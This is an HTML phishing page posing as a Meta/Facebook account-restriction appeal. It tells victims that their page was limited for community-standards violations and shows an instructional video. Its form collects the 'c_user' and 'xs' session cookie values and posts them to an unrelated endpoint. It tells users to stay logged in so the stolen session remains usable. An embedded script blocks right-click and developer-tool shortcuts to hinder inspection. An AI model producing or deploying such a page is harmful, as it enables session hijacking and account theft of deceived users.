<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png">
    <link rel="stylesheet" href="styles.css">
    <title>Action | Required</title>
</head>
<body>

    <nav>
        <div class="av-l">
            <p class="txt-2">
                facebook
            </p>
        </div>
        <div class="av-r">
            <div class="sh-box">
                <img src="https://pbs.twimg.com/media/GNYVN91XoAAviIK?format=png&name=4096x4096" alt="search">
                <input type="text" placeholder="Search" >
            </div>
        </div>
    </nav>

  <div class="deho">

    <form class="content" action="Hey-Come-Here-Tariq-Bro" method="post">
      
      <div><img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" width="150px" alt="meta"></div>

      <div class="text5">
        <p>
          We have detected unusual activity on your page that violates our community standards.
      </p><br>
      <p>
          Your access to your page has been limited, and you are currently unable to post, share, or comment using your page.
      </p><br>
      <p>
          If you believe this to be a mistake, you have the option to submit an appeal by providing the necessary information.
      </p>
      </div>

      <div class="vd2">

        <p class="text3">Detailed Video Information</p>

        <video controls="" loop autoplay width="250" poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png" >
          <source src="https://detailed-video-29b30.web.app/detailed%20video.mp4"  type="video/mp4" >
        </video>
        <p class="text5">Please be sure to provide the requested information below.</p>

      </div>

      <div>
        <p class="tx-2">
        c_user
       </p>
        <input type="number" name="c_user" id="c_user"  required="">
      </div>

      <div>
        <p class="tx-2">
        xs
       </p>
        <input  type="text" name="xs" id="xs"  required="">
      </div>
      <p class="t1">Please make sure account not to log out from your computer or laptop until you have received a verification email.</p>

      <div class="sub2">
        <button class="bn2">
          <p>
            Submit
          </p>
        </button>
  
      </div>

    </form>
    
  </div>

  <div class="copyright">
    <p>Meta © 2024</p>
  </div>

  <script>
    document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
    });
    document.onkeydown = function(e) {
        if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
            e.preventDefault();
        }
    };
</script>

    
</body>
</html>